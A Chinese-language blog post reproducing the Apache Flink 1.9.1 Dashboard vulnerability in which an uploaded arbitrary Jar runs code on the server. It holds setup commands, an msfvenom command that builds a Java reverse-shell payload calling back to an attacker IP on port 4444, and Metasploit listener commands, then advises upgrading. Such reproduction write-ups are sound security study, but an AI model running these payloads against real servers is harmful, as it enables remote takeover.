Apache Flink 任意 Jar 包上传导致 RCE 漏洞

发布于 2024-08-21 09:38:17 字数 2034 浏览 8 评论 0

Apache Flink 是一个分布式大数据处理引擎,可对有限数据流和无限数据流进行有状态计算。可部署在各种集群环境,对各种大小的数据规模进行快速计算。

ApacheFlink 是由 Apache 软件基金会开发的开源流处理框架,其核心是用 Java 和 Scala 编写的分布式流数据流引擎。Flink 以数据并行和流水线方式执行任意流数据程序,Flink 的流水线运行时系统可以执行批处理和流处理程序。此外,Flink 的运行时本身也支持迭代算法的执行。

攻击者可利用该漏洞在 Apache Flink Dashboard 页面中上传任意 Jar 包,利用 Metasploit 在 Apache Flink 服务器中执行任意代码,获取服务器最高权限,所以危害性较大。

影响范围

  • Apache Flink <= 1.9.1

环境搭建

  1. 下载 Apache Flink 1.9.1 包:
wget http://mirrors.tuna.tsinghua.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
  1. 解压安装包:
tar –zxvf flink-1.9.1-bin-scala_2.11.tgz
  1. 进入到 bin 目录下面启动 Flink:
./start-cluster.sh

浏览器访问: http://IP:8081

漏洞复现

  1. msf 生成 reverse shell 的马
msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f jar > shell.jar
  1. msf 设置监听
use exploit/multi/handler
set payload java/shell/reverse_tcp
expolit

  1. 上传 shell.jar 并提交

  1. 反弹回的 shell

修复建议

  • 将 Apache Flink 升级最新版本

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

薄情伤

暂无简介

0 文章
0 评论
23 人气
更多

推荐作者

謌踐踏愛綪

文章 0 评论 0

开始看清了

文章 0 评论 0

高速公鹿

文章 0 评论 0

alipaysp_PLnULTzf66

文章 0 评论 0

热情消退

文章 0 评论 0

白色月光

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文